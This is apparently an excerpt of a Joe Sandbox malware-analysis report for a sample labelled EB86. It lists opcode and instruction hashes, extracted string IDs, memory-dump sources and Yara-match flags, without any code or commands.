• Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
• Instruction Fuzzy Hash: 0281FB6124C3818BD719DF3988A137AFFD29FE6218F2C496DE4D18B681D339C50ACB56
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID: 8<j?$D$4b
• API String ID: 0-2390459867
• Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
• Instruction ID: b31d7765b50fe5da72acd4eceaa3461b1016088ded1e177ce8b27f3ca53c8b68
• Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
• Instruction Fuzzy Hash: 7E81E8602083918BD719CF3A946136BFFD29FE6314F6D496EE4D18B381D23CC5068B5A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID:
• String ID: 8/d$D`a&$NMNO
• API String ID: 0-2397089600
• Opcode ID: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
• Instruction ID: 8496bcbdc018cc7f210226911d2aba05cefd326ec91261c5c59de8eff66c88e3
• Opcode Fuzzy Hash: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
• Instruction Fuzzy Hash: EE8145356483454FD318CF28CCA1B6BB7A2EFC5328F29C66CE5A547391DB3298098751
Strings
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID:
• String ID: 8/d$:;
• API String ID: 0-98051459
• Opcode ID: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
• Instruction ID: b723e585620fed0571dac7b57076c9cbe3139caa9afcde44a40f48c53b888cc4
• Opcode Fuzzy Hash: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
• Instruction Fuzzy Hash: 90A1E571A843909BDB12AF24CCD176BB3E1EF82324F198528EC958B281E375ED45CB52
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID: 8/d$:;
• API String ID: 0-98051459
• Opcode ID: 303de10fff242c4ff705677ea5eca08dca5e362961479335f7d5ab6b711b2e43
• Instruction ID: a8ce0ab78c4be7f089376efb71ad2075c1d737e56b9c5b96f1916c659004ebff
• Opcode Fuzzy Hash: 303de10fff242c4ff705677ea5eca08dca5e362961479335f7d5ab6b711b2e43
• Instruction Fuzzy Hash: FCA11972605320ABD7109F24ED8276B73E0EF85358F88852EF8959B391E3BCDD05875A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID:
• String ID: 8/d$NP,?
• API String ID: 0-905665905
• Opcode ID: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
• Instruction ID: b643b3529b45a077269c0abb964e2670d9a54edebb5cd2b594fdc8825ef33d0e
• Opcode Fuzzy Hash: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
• Instruction Fuzzy Hash: 10A148756843109FDB24CF28C8D1B3BB3A6EBC9728F19862DE4D957290D731A801CBD1
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID: 8/d$NP,?
• API String ID: 0-905665905
• Opcode ID: 4292c81706fc5104aea80fe8ef179a1662a25d3dca60aede90bca8e2f2b4382c
• Instruction ID: f65ccde577a60585fc50111e68a200c88a0f1f1b3df19762a23bd62bb81c5e5c
• Opcode Fuzzy Hash: 4292c81706fc5104aea80fe8ef179a1662a25d3dca60aede90bca8e2f2b4382c
• Instruction Fuzzy Hash: 5DA18E75A083209BD324DF19CCC173BB3A6EBC9324F19962EE995673D1D738AC018799
Strings
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID:
• String ID: 8/d$_\]R
• API String ID: 0-3512975805
• Opcode ID: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
• Instruction ID: ad03b67804417eeff9f64e800155e88e8e7f143afeb1ae474513e03929dfdddd
• Opcode Fuzzy Hash: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
• Instruction Fuzzy Hash: 649126356483518BCB18DF28C860A6FB7E2FFD9724F19852CE8C587291E731D905C786
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: 8/d$_\]R
                                                                                                                                                                                                                                                  • API String ID: 2994545307-3512975805
                                                                                                                                                                                                                                                  • Opcode ID: 40b2a5fcce8fbd99e35ebddbeea2a32485a095c58c85b1bcf33869944168392c
                                                                                                                                                                                                                                                  • Instruction ID: 67d2bc21efa779ec1b2302c596d4d55850990720b38256b1c81cc65d81c9891d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40b2a5fcce8fbd99e35ebddbeea2a32485a095c58c85b1bcf33869944168392c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 729114315083119BD718DF28D9A0A2FB7E2EFD9314F59862DF48697391E774E802C78A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: o~$yr
                                                                                                                                                                                                                                                  • API String ID: 0-1013308823
                                                                                                                                                                                                                                                  • Opcode ID: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
                                                                                                                                                                                                                                                  • Instruction ID: 24f3d5a115f3db3729c1b8906ad960607caf898cf75328b2f7ff7f0fc012492d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 979127769483508BD320DF19C88466BF7E2EFC5314F19892CE9D94B390E7B4C506CB86
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: o~$yr
                                                                                                                                                                                                                                                  • API String ID: 0-1013308823
                                                                                                                                                                                                                                                  • Opcode ID: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
                                                                                                                                                                                                                                                  • Instruction ID: 9949b5826033667454bdd212c251d03fc0b1eef30724b4879d74d6325ed2a79f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48913975A0C3208BD320DF19D84066BBBE2EFD5324F09892DE9D95B391E7B8C905C786
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d$=^"\
                                                                                                                                                                                                                                                  • API String ID: 0-215442021
                                                                                                                                                                                                                                                  • Opcode ID: 30c79af13426789e40e09411e713427a5fad7c453bf973c8dd38d9b25f6a572f
                                                                                                                                                                                                                                                  • Instruction ID: 31f6d952e69ddc92c57c3d15082e8394249c76af6de0d574896d183d93ceef01
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30c79af13426789e40e09411e713427a5fad7c453bf973c8dd38d9b25f6a572f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4281DE383052019BE724DF1CD990A2BB3E2EF89314F54866DF9858B3A0DB35EC51CB0A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: :7$%$:7$%
                                                                                                                                                                                                                                                  • API String ID: 0-2391988857
                                                                                                                                                                                                                                                  • Opcode ID: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
                                                                                                                                                                                                                                                  • Instruction ID: 5d85b922e0bb67d987acda1252dd02b6154960426b529d5a0e13ec98ade2db7a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B921B3711183908BD7089F79C964B6FFBE5BB86318F545A2DE1D287291D7B4C405CB82
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: :7$%$:7$%
                                                                                                                                                                                                                                                  • API String ID: 0-2391988857
                                                                                                                                                                                                                                                  • Opcode ID: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
                                                                                                                                                                                                                                                  • Instruction ID: 0de6392d9aeb990522659998ecc2397938767f988235b0ae13ec08bed24327b9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA21F1701093908BD7089B69C865B6FFBE4AB86318F105A2DE1D2872D1DBB48809CB82
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d$
                                                                                                                                                                                                                                                  • API String ID: 0-2623845793
                                                                                                                                                                                                                                                  • Opcode ID: 59ebb6f1c1a99dc460b157ce1b0bc87d6a21890c15c4f19892189c2b52108220
                                                                                                                                                                                                                                                  • Instruction ID: 0be8029bff5fd660166c9fbf62f4e909b56eab2fa1e023d290f8b0719cf295cf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59ebb6f1c1a99dc460b157ce1b0bc87d6a21890c15c4f19892189c2b52108220
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75110471368280AFD3648F64CD9677B73EAABC2324F28863CD1D8972D1DB35D4408B09
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID:
• String ID: MO$MO
• API String ID: 0-3148518880
• Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
• Instruction ID: 42c761b6ab6f9391aca449a77fd9c4b0a458877a476cd4d760de91f04f749cce
• Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
• Instruction Fuzzy Hash: 9D119A741442918BEF148FA89D9566BBFA0EF42220F1499989C856F38BC738C511CB64
Strings
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID:
• String ID: 7&'$$vA\
• API String ID: 0-2621209329
• Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
• Instruction ID: 68396cd896546055e4c74e717cd440596de8401acdf4452539e4e15a449a3a81
• Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
• Instruction Fuzzy Hash: E3F068345545944BDB918F3D98A97BE67F0E757214F202AB5C65AE32A2C731C4818F08
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID: 7&'$$vA\
• API String ID: 0-2621209329
• Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
• Instruction ID: 095e66cfb836127910944c44464487434cf5069dbd9256ca3ed79a62a3e9a21d
• Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
• Instruction Fuzzy Hash: 02F09C745145544BEB918F7C98996BF67F0F713214F302BB5C65AE32A2C634C8914F0C
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02177E61
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID: EnvironmentExpandStrings
• String ID:
• API String ID: 237503144-0
• Opcode ID: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
• Instruction ID: 1a3f04de4081ba01aa4a2ef4d3d1b1b8a4bb42186e2087a2c802f8454c0f3342
• Opcode Fuzzy Hash: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
• Instruction Fuzzy Hash: 22B1F2729487218BC314CF28C8917AAF7F2FFD9314F19962CE4C55B294E7389902C796
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID: 8/d
• API String ID: 0-2382032918
• Opcode ID: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
• Instruction ID: d2e23a67c1903cd1e9c185385271eb72bcb916f6a4fd91b19e1fe5de6aa7faac
• Opcode Fuzzy Hash: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
• Instruction Fuzzy Hash: 4B122775B00226CBDB14CF68D8917AFB7B2FF8A300F5980A9C441AB3A5D7399D42DB54
Strings
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID:
• String ID: ''
• API String ID: 0-694448769
• Opcode ID: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
• Instruction ID: 5ee31369bac1c27927d18705f966606cfc38d2ce65e8134e3508c717dbd5d32f
• Opcode Fuzzy Hash: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
• Instruction Fuzzy Hash: 529110B16583008BC3248F28C89166BB7F2EFD5364F189A2DE8D68B790E774C645C796
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID: ''
• API String ID: 0-694448769
• Opcode ID: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
• Instruction ID: 51f56407e220038c845c571476400c53c6676d21aaa49407b98741bf0e440936
• Opcode Fuzzy Hash: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
• Instruction Fuzzy Hash: 589124756483108BC3148F28CC912ABB7E2EFD5354F18D92DE8D58B391E778C945C79A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_EB86.jbxd
Similarity
• API ID:
• String ID: *+
• API String ID: 0-2181965719
• Opcode ID: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
• Instruction ID: a6a176cfa994aee3612649f895d437fda5b17e7ce8ddb12fb8ae0738439bb6c9
• Opcode Fuzzy Hash: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
• Instruction Fuzzy Hash: 0BB177B15093818BD7318F25C8917EBBBF1EF96314F18892DD4C98B391EB384446CB8A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
Yara matches
Similarity
• API ID:
• String ID: UXY^
• API String ID: 0-1486013802
• Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
• Instruction ID: 5fdd1e2c428ffbec881db818d9169af42ad8bdb1f1feeec8a09932e53f8f6edb
• Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
• Instruction Fuzzy Hash: 929126B5604B818FD315CF29C994A62FBA2FF96300B19869CC0D28FB56C739E416CF95
Strings
Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: UXY^
                                                                                                                                                                                                                                                  • API String ID: 0-1486013802
                                                                                                                                                                                                                                                  • Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                                                                                                                                                                  • Instruction ID: d4a14a9f2c2f0854964ffc34a88a484fd9aac6a31bc7c6ca58301aeff22ad83a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B79135B5504B418FD315CF2AC990622FBA2FF96300B188AACC0D24FB56C738E816CF95
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d
                                                                                                                                                                                                                                                  • API String ID: 0-2382032918
                                                                                                                                                                                                                                                  • Opcode ID: 87ffeb648b9d3b2ccfc57117cdf1fc242bb3e2d04f71168daa08cd74ffe209e9
                                                                                                                                                                                                                                                  • Instruction ID: 4e43b3032b5f77b82ebf5265758dd730748cf5b28328c74b298a748a547da810
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87ffeb648b9d3b2ccfc57117cdf1fc242bb3e2d04f71168daa08cd74ffe209e9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2915635E04225DFDB15CFA8D8907AEB7B2FF4A300F9980A9D502AB351D739AD42CB44
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d
                                                                                                                                                                                                                                                  • API String ID: 0-2382032918
                                                                                                                                                                                                                                                  • Opcode ID: 8ede958760def0fb47ef62c8d664d44c55fbe6b810f6c68a305d53f1873dda57
                                                                                                                                                                                                                                                  • Instruction ID: 6b56226ad8b0c30fedef16d1ed8bae040211a9a072c8b9eb3e8edc34aa7c4811
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ede958760def0fb47ef62c8d664d44c55fbe6b810f6c68a305d53f1873dda57
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9781B2386452059FD724DF2CC8A0A2AB3F2EF89714F15856CED95CB3A4EB31E851CB45
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: "
                                                                                                                                                                                                                                                  • API String ID: 0-123907689
                                                                                                                                                                                                                                                  • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                  • Instruction ID: 6dec49bc15768d016656feb92f768c861d09340e24ffeca4549e01789b0ad71f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D71D032A483559BD724AE38E8C031EBBE2ABC6724F19C52DE4949B3D1D7759C44CF82
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                   • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: "
                                                                                                                                                                                                                                                  • API String ID: 0-123907689
                                                                                                                                                                                                                                                  • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                  • Instruction ID: 6564e7b3ad14b453794cbf2f19722db2d5742acb1a2f8ce2a072c031a44184fe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23710432F083254BD714CE28E88071FBBE2ABC5710FA9852EE4958B391D239DD45878A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: _;=8
                                                                                                                                                                                                                                                  • API String ID: 0-3640539833
                                                                                                                                                                                                                                                  • Opcode ID: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
                                                                                                                                                                                                                                                  • Instruction ID: 2447083201972a05585b1eeb2ae0b50f205839780ed8e8223be8bf5566fde7d7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B151EFB0511B508BC7389F25C861AB7BBF1FF82349B084E5DC5C38BA55E739A509CBA1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
